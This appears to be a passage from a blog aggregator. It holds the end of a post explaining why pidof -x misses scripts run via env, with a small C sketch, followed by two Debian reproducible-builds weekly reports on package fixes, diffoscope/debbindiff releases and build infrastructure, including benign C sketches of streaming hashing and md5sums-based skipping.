What Next? So the mystery of pidof missing scripts has a reasonable explanation. The problem is: how to fix pidof? There doesn't seem to be a fix that isn't a kludge. Hard-coding potential script names seems just evil, but there doesn't seem to be a way to differentiate between a script using env and, say, "vi ./pidofx". If you have some ideas, comment below or in the issue on GitLab.
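To make the matching concrete, here is a small self-contained C sketch of the check quoted above, run against the comm and argv[1] values from the two example processes. It illustrates the logic only; it is not procps-ng's actual code.

#include <stdio.h>
#include <string.h>

/* Return the basename of a path, as pidof does before matching. */
static const char *base(const char *path)
{
    const char *slash = strrchr(path, '/');
    return slash ? slash + 1 : path;
}

/* The -x match described above: comm must be a prefix of the basename
 * of argv[1], and one of three program/argv[1] comparisons must hold. */
static int matches(const char *comm, const char *program, const char *cmd_arg1)
{
    const char *cmd_arg1base = base(cmd_arg1);
    const char *program_base = base(program);

    return comm != NULL
        && strncmp(comm, cmd_arg1base, strlen(comm)) == 0
        && (strcmp(program, cmd_arg1base) == 0
            || strcmp(program_base, cmd_arg1) == 0
            || strcmp(program, cmd_arg1) == 0);
}

int main(void)
{
    /* #!/bin/sh script: comm is "pidofx", argv[1] is the script path. */
    printf("plain sh: %d\n", matches("pidofx", "pidofx", "/tmp/pidofx"));
    /* #!/usr/bin/env sh script: comm is "bash", so the prefix test fails. */
    printf("via env:  %d\n", matches("bash", "pidofx", "/tmp/pidofx"));
    return 0;
}

Compiled and run, it prints 1 for the #!/bin/sh case and 0 for the env case, matching the behaviour observed above.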

18 October 2015

Lunar: Reproducible builds: week 25 in Stretch cycle

What happened in the reproducible builds effort this week:

Toolchain fixes Niko Tyni wrote a new patch adding support for SOURCE_DATE_EPOCH in Pod::Man. This would complement or replace the previously implemented POD_MAN_DATE environment variable in a more generic way. Niko Tyni also proposed a fix to prevent mtime variation in directories due to debhelper's usage of cp --parents -p.

Packages fixed The following 119 packages became reproducible due to changes in their build dependencies: aac-tactics, aafigure, apgdiff, bin-prot, boxbackup, calendar, camlmix, cconv, cdist, cl-asdf, cli-common, cluster-glue, cppo, cvs, esdl, ess, faucc, fauhdlc, fbcat, flex-old, freetennis, ftgl, gap, ghc, git-cola, globus-authz-callout-error, globus-authz, globus-callout, globus-common, globus-ftp-client, globus-ftp-control, globus-gass-cache, globus-gass-copy, globus-gass-transfer, globus-gram-client, globus-gram-job-manager-callout-error, globus-gram-protocol, globus-gridmap-callout-error, globus-gsi-callback, globus-gsi-cert-utils, globus-gsi-credential, globus-gsi-openssl-error, globus-gsi-proxy-core, globus-gsi-proxy-ssl, globus-gsi-sysconfig, globus-gss-assist, globus-gssapi-error, globus-gssapi-gsi, globus-net-manager, globus-openssl-module, globus-rsl, globus-scheduler-event-generator, globus-xio-gridftp-driver, globus-xio-gsi-driver, globus-xio, gnome-control-center, grml2usb, grub, guilt, hgview, htmlcxx, hwloc, imms, kde-l10n, keystone, kimwitu++, kimwitu-doc, kmod, krb5, laby, ledger, libcrypto++, libopendbx, libsyncml, libwps, lprng-doc, madwimax, maria, mediawiki-math, menhir, misery, monotone-viz, morse, mpfr4, obus, ocaml-csv, ocaml-reins, ocamldsort, ocp-indent, openscenegraph, opensp, optcomp, opus, otags, pa-bench, pa-ounit, pa-test, parmap, pcaputils, perl-cross-debian, prooftree, pyfits, pywavelets, pywbem, rpy, signify, siscone, swtchart, tipa, typerep, tyxml, unison2.32.52, unison2.40.102, unison, uuidm, variantslib, zipios++, zlibc, zope-maildrophost. The following packages became reproducible after getting fixed: Packages which could not be tested: Some uploads fixed some reproducibility issues but not all of them: Patches submitted which have not made their way to the archive yet: Lunar reported that test strings depend on the default character encoding of the build system in ongl.

reproducible.debian.net The 189 packages composing the Arch Linux core repository are now being tested. No packages are currently reproducible, but most of the time the difference is limited to metadata. This has already gained some interest in the Arch Linux community. An explicit log message is now visible when a build has been killed due to the 12-hour timeout. (h01ger) The remote build setup has been made more robust and self-maintenance has been further improved. (h01ger) The minimum age for rescheduling of already tested amd64 packages has been lowered from 14 to 7 days, thanks to the increase in hardware resources sponsored by ProfitBricks last week. (h01ger)

diffoscope development diffoscope version 37 was released on October 15th. It adds support for two new file formats (CBFS images and Debian .dsc files). After proposing the required changes to TLSH, fuzzy hashes are now computed incrementally; this avoids reading entire files into memory, which caused problems for large packages (the streaming pattern is sketched at the end of this post). New tests have been added for the command-line interface. More character encoding issues have been fixed. Malformed md5sums will now be compared as binary files instead of making diffoscope crash, among several other minor fixes. Version 38 was released two days later to fix the versioned dependency on python3-tlsh.

strip-nondeterminism development strip-nondeterminism version 0.013-1 has been uploaded to the archive. It fixes an issue with nonconformant PNG files with trailing garbage, reported by Roland Rosenfeld.

disorderfs development disorderfs version 0.4.1-1 is a stop-gap release that disables lock propagation, unless --share-locks=yes is specified, as it is still affected by unidentified issues.

Documentation update Lunar has been busy creating a proper website for reproducible-builds.org that would be a common location for news, documentation, and tools for all free software projects working on reproducible builds. It's not yet ready to be published, but it's surely getting there. [Screenshots: the homepage and the "Who's involved?" page of the future reproducible-builds.org website.]

Package reviews 103 reviews have been removed, 394 added and 29 updated this week. 72 FTBFS issues were reported by Chris West and Niko Tyni. New issues: random_order_in_static_libraries, random_order_in_md5sums.
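The incremental computation mentioned in the diffoscope paragraph follows the familiar streaming-hash shape: feed fixed-size chunks into the hash state rather than loading the whole file at once. A minimal C sketch of that shape, using a trivial running checksum as a stand-in (TLSH's real state and API are of course different):

#include <stdio.h>

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s FILE\n", argv[0]);
        return 1;
    }
    FILE *fp = fopen(argv[1], "rb");
    if (fp == NULL) {
        perror(argv[1]);
        return 1;
    }

    unsigned char buf[64 * 1024];       /* fixed-size chunk */
    unsigned long state = 0;            /* incremental hash state */
    size_t n;

    /* Update the state chunk by chunk; memory use stays bounded no
     * matter how large the file is. */
    while ((n = fread(buf, 1, sizeof buf, fp)) > 0)
        for (size_t i = 0; i < n; i++)
            state = state * 31 + buf[i];

    fclose(fp);
    printf("%08lx\n", state & 0xffffffffUL);
    return 0;
}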

3 August 2015

Lunar: Reproducible builds: week 14 in Stretch cycle

What happened in the reproducible builds effort this week:

Toolchain fixes akira submitted a patch to make cdbs export SOURCE_DATE_EPOCH. She uploaded a package with the enhancement to the experimental reproducible repository.

Packages fixed The following 15 packages became reproducible due to changes in their build dependencies: dracut, editorconfig-core, elasticsearch, fish, libftdi1, liblouisxml, mk-configure, nanoc, octave-bim, octave-data-smoothing, octave-financial, octave-ga, octave-missing-functions, octave-secs1d, octave-splines, valgrind. The following packages became reproducible after getting fixed: Some uploads fixed some reproducibility issues but not all of them: In contrib, Dmitry Smirnov improved libdvd-pkg with 1.3.99-1-1. Patches submitted which have not made their way to the archive yet:

reproducible.debian.net Four armhf build hosts were provided by Vagrant Cascadian and have been configured to be used by jenkins.debian.net. Work on including armhf builds in the reproducible.debian.net webpages has begun. So far the repository comparison page just shows us which armhf binary packages are currently missing in our repo. (h01ger) The scheduler has been changed to re-schedule more packages from stretch than sid, as the gcc5 transition has started. This mostly affects build log age. (h01ger) A new depwait status has been introduced for packages which can't be built because of missing build dependencies. (Mattia Rizzolo)

debbindiff development Finally, on July 31st, Lunar released debbindiff 27 containing a complete overhaul of the code for the comparison stage. The new architecture is more versatile and extensible while minimizing code duplication. libarchive is now used to handle cpio archives and iso9660 images through the newly packaged python-libarchive-c. This should also help support a couple of other archive formats in the future. Symlinks and devices are now properly compared. Text files are compared as Unicode after being decoded, and encoding differences are reported. Support for Sqlite3 and Mono/.NET executables has been added. Thanks to Valentin Lorentz, the test suite should now run on more systems. A small deficiency in unsquashfs has been identified in the process. A long-standing optimization is now performed on Debian packages: based on the content of the md5sums control file, we skip comparing files with matching hashes (the idea is sketched at the end of this post). This makes debbindiff usable on packages with many files. Fuzzy-matching is now performed for files in the same container (like a tarball) to handle renames. Also, for Debian .changes, listed files are now compared without looking at the embedded version number. This makes debbindiff a lot more useful when comparing different versions of the same package. Building on this rearchitecturing, work has been done to allow parallel processing. The branch now seems to work most of the time, but more testing needs to be done before it can be merged. The current fuzzy-matching algorithm, ssdeep, has shown disappointing results. One important use case is being able to properly compare debug symbols. Their path is made using the Build ID. As this identifier is made with a checksum of the binary content, finding things like CPP macros is much easier when a diff of the debug symbols is available. The good news is that TLSH, another fuzzy-matching algorithm, has been tested with much better results. A package is waiting in NEW and the code is ready for it to become available. A follow-up release, 28, was made on August 2nd, fixing the content label used for gzip, bzip2 and xz files, and an error on text files differing only in their encoding. It also contains a small code improvement in how comments on Difference objects are handled. This is the last release named debbindiff. A new name has been chosen to better reflect that it is not a Debian-specific tool. Stay tuned!

Documentation update Valentin Lorentz updated the patch submission template to suggest writing the kind of issue in the bug subject. Small progress has been made on the Reproducible Builds HOWTO while preparing the related CCCamp15 talk.

Package reviews 235 obsolete reviews have been removed, 47 added and 113 updated this week. 42 reports for packages failing to build from source have been made by Chris West (Faux). New issue added this week: haskell_devscripts_locale_substvars.

Misc. Valentin Lorentz wrote a script to report packages tested as unreproducible installed on a system. We encourage everyone to run it on their systems and give feedback!
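The md5sums optimization mentioned above reduces to: before running an expensive content diff, compare the checksums recorded in the two packages and skip any file whose hashes already match. A minimal C sketch of the idea (the entry type and deep_compare callback are hypothetical illustrations, not debbindiff's actual code, and it assumes both lists contain the same paths in the same order):

#include <stdio.h>
#include <string.h>

/* One entry from a package's md5sums control file. */
struct entry {
    const char *path;
    const char *md5;    /* hex digest recorded at build time */
};

/* Only deep-compare files whose recorded hashes differ; deep_compare
 * stands in for the expensive content diff. */
static void compare_packages(const struct entry *a, const struct entry *b,
                             size_t n, void (*deep_compare)(const char *))
{
    for (size_t i = 0; i < n; i++) {
        if (strcmp(a[i].md5, b[i].md5) == 0)
            continue;               /* identical content: skip the diff */
        deep_compare(a[i].path);    /* hashes differ: do the real work */
    }
}

static void report(const char *path)
{
    printf("content differs: %s\n", path);
}

int main(void)
{
    const struct entry v1[] = { { "usr/bin/tool",    "d41d8cd9" },
                                { "usr/share/doc/t", "9e107d9d" } };
    const struct entry v2[] = { { "usr/bin/tool",    "d41d8cd9" },
                                { "usr/share/doc/t", "e4d909c2" } };
    compare_packages(v1, v2, 2, report);
    return 0;
}

On a package where most files are unchanged between versions, almost every entry takes the cheap strcmp path, which is why the optimization makes large packages tractable.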
